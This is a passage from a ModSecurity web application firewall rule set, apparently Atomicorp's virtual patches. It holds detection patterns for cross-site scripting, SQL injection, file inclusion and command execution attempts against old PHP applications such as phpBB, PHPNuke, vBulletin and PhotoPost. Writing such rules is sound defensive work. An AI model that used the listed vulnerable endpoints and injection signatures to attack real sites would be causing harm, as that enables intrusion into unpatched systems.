attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310244: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-autotargeting\.php" "id:310244,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-autotargeting.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310245: phpAdsNew path disclosure SecRule REQUEST_URI "/maintenance/maintenance-reports\.php" "id:310245,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew maintenance-reports.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310246: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/phpads\.php" "id:310246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility phpads.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310247: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/remotehtmlview\.php" "id:310247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility remotehtmlview.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310248: phpAdsNew path disclosure SecRule REQUEST_URI "/misc/backwards\x20compatibility/click\.php" "id:310248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpAdsNew backwards compatibility click.php path disclosure attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310253: citrusdb SecRule REQUEST_URI "/citrusdb/tools/uploadcc\.php" "id:310253,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: citrusdb tools/uploadcc.php credit card data upload attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310262: phpbb XSS SecRule REQUEST_FILENAME "/posting\.php" "chain,id:310262,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:phpbb2mysql_t "(?:\<(?:script|javascript|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310263: phpbb XSS SecRule REQUEST_URI "/posting\.php" "chain,id:310263,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "(?:\<(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310264: phpbb XSS SecRule REQUEST_URI|REQUEST_BODY "/privmsg\.php" "id:310264,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB privmsg.php cross-site-scripting attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI|REQUEST_BODY "\|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310266,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mail_autocheck.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310269: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=\&desc=\&pages=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310269,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310270: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_URI "/divers\.php\?action=liste\&liste=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310270,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310271: Multiple Vulnerabilities in ProjectBB SecRule REQUEST_FILENAME "/zip/divers\.php" "chain,id:310271,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjectBB Zip/divers.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" Secrule ARGS:desc "'" # Rule 310272: WebChat english.php or db_mysql.php file include SecRule REQUEST_FILENAME "/defines\.php" "chain,id:310272,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebChat defines.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "(?:db_mysql\.php|english\.php)" # Rule 310273: Cross-Site Scripting Vulnerability in D-Forum SecRule REQUEST_URI "/nav\.php3\?page=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310273,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: D-Forum nav.php3 cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310275: Multiple Vulnerabilities in auraCMS SecRule REQUEST_URI "/hits\.php\?hits=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310275,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA hits.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310276: Multiple Vulnerabilities in auraCMS SecRule REQUEST_URI "/counter\.php\?theCount=(?:\<(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "id:310276,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auraCMA counter.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310277: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php?[^\r\n]*comma=[^\r\n\x26]*system\x28" "id:310277,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310278: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php\?" "id:310278,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI|REQUEST_BODY "\.system\(.+\)\." # Rule 310279: vBulletin Remote Command Execution Attempt SecRule REQUEST_URI "/forumdisplay\.php\?*comma=" "id:310279,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310280: PHPNuke general XSS attempt #/modules.php?name=News&file=article&sid=1&optionbox= SecRule REQUEST_URI "/modules\.php\?*name=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310281: PHPNuke general XSS attempt SecRule REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(?:script|about|applet|activex|chrome)*\>" "id:310281,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310282: PHPNuke SQL injection attempt SecRule REQUEST_URI "/modules\.php\?*name=search*instory=" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310282,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" # Rule 310283: PHPNuke SQL injection attempt SecRule REQUEST_FILENAME "/modules.php " "chain,t:none,t:urlDecodeUni,t:lowercase,id:310283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" SecRule ARGS:name "(?:search|web_links)" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" SecRule ARGS "'" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase" # Rule 310284: EasyDynamicPages exploit SecRule REQUEST_URI "!(^/livehelp/admin_users_refresh\.php)" "chain,id:310284,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages edp_relative_path exploitation attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule REQUEST_URI "edp_relative_path=" # Rule 310286: phpnuke sql insertion #SecRule REQUEST_URI "/modules\.php*name=forums.*file=viewtopic*/forum=.*\'/" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310286,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt'" # Rule 310287: WAnewsletter newsletter.php file include attempt SecRule REQUEST_URI "newsletter\.php*waroot*start\.php" "id:310287,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WAnewsletter newsletter.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310288: Typo3 translations.php file include SecRule REQUEST_URI "/translations\.php*only" "id:310288,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Typo3 translations.php local file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310307: RUNCMS,Exoops,CIAMOS highlight file access hole SecRule REQUEST_URI "/class/debug/highlight\.php\?file=(?:/|\.\./)" "id:310307,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RUNCMS.Exoops.CIAMOS highlight.php file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310308: TRG/CzarNews News Script Include File Hole Lets Remote users # Execute Arbitrary Commands SecRule REQUEST_URI "/install/(?:article|authorall|comment|display|displayall.)\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310308,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TRG/CzarNews /install/* local command execution attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310309: zpanel XSS #SecRule REQUEST_FILENAME "/zpanel.php" # "chain,id:310309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: zPanel zpanel.php cross-site-scripting or SQLi attempt'" #SecRule ARGS:page "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|')" # Rule 310311: Phorum http Response Splitting Vulnerability #SecRule REQUEST_URI "/search\.php\?forum_id=.*\&search=.*\&body=.*Content-Length\:.*HTTP/1\.0.*Content-Type\:.*Content-Length\:" # "id:310311,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum search.php http response splitting attempt'" # Rule 310313: PhotoPost Pro SecRule REQUEST_FILENAME "/showgallery\.php" "chain,id:310313,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|<)" # Rule 310314: PhotoPost Pro SecRule REQUEST_URI "/showgallery\.php\?si=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310314,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" # Rule 310315: PhotoPost Pro #SecRule REQUEST_URI "/showgallery\.php\?ppuser=[0-9].*\&cat=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # "id:310315,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt'" # Rule 310316: PhotoPost Pro #SecRule REQUEST_URI "/showgallery\.php\?(?:cat|ppuser)=[0-9].*\'" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310316,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhotoPost showgallery.php SQL injection attempt'" # Rule 310320: Kayako eSupport Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questiondetails\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310320,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310321: Kayako eSupport Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=questionprint\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310321,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310322: Kayako eSupport Remote Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=troubleshooter\&_c=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310322,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310323: Kayako eSupport Remote Cross Site Scripting Vulnerability #SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=subcat\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'" # Rule 310325: phpSysInfo XSS vulns #SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #SecRule REQUEST_URI "/includes/system_footer\.php" # "chain,id:310325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" #SecRule ARGS "^\"\>" # Rule 310327: DigitalHive Remote Unathenticated Software Re-install and # Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/base\.php\?page=forum/msg\.php-afs-1-\"/\>\" # "id:310327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'" # Rule 310328: DigitalHive Remote Unathenticated Software Re-install and # Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/hive/base\.php\?page=membres\.php\&mt=\"/\>\" # "id:310328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'" # Rule 310329: Topic Calendar Mod for phpBB Cross-Site Scripting Attack SecRule REQUEST_FILENAME "/calendar_scheduler\.php" "chain,id:310329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Topic Calendar calendar_scheduler.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase" SecRule ARGS:start "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # Rule 310331: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/includes/system_footer\.php\?text.*=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" # Rule 310332: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'" # Rule 310333: phpSysInfo Cross-Site Scripting Vulnerabilities #SecRule REQUEST_URI "/includes/system_footer\.php\?hide_picklist=.*=\